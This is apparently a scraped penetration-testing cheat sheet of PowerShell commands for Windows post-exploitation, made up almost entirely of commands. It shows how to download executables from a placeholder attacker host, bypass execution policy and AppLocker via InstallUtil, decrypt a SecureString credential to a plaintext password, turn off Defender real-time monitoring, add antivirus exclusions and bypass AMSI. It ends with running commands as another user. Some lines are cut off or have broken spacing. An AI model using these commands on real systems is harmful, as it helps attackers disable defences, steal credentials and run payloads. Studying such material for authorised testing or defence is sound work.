Copy C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
Copy Invoke-Webrequest -URI http://IP/file.exe -O file.exe
(New-Object Net.WebClient).DownloadFile("http://IP/file.exe","C:\Windows\Temp\file.exe")
wget http://IP/file.exe -OutFile file.exe
curl http://IP/file.exe -O file.exe
Copy PowerShell.exe -ExecutionPolicy Bypass -File .\file.ps1
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
Copy $ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
Copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole= true /U c: \t emp \p sby.exe
Copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole= true /revs
Secure String to Plaintext
Copy $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
$user = "HTB\Tom"
$cred = New-Object System.management.Automation.PSCredential($user, $pass)
$cred.GetNetworkCredential () | fl
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
Copy $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential () | Format-List *
UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB
Antivirus (Requires Higher Privileges)
Copy #Check status
Get-MpComputerStatus
#Disable
Set-MpPreference -DisableRealtimeMonitoring $true
#Set exclusion path
Add-MpPreference -ExclusionPath "C:\users\public\documents\magichk"
#Disable AMSI
"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,St
Execute Commands as Another User
Copy #CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
# Execute `whoami` command
Invoke-Command -Computer <Computer-Name> -ScriptBlock { whoami } -Credential $cred
Copy Get-ScheduledTask | where { $_ .TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State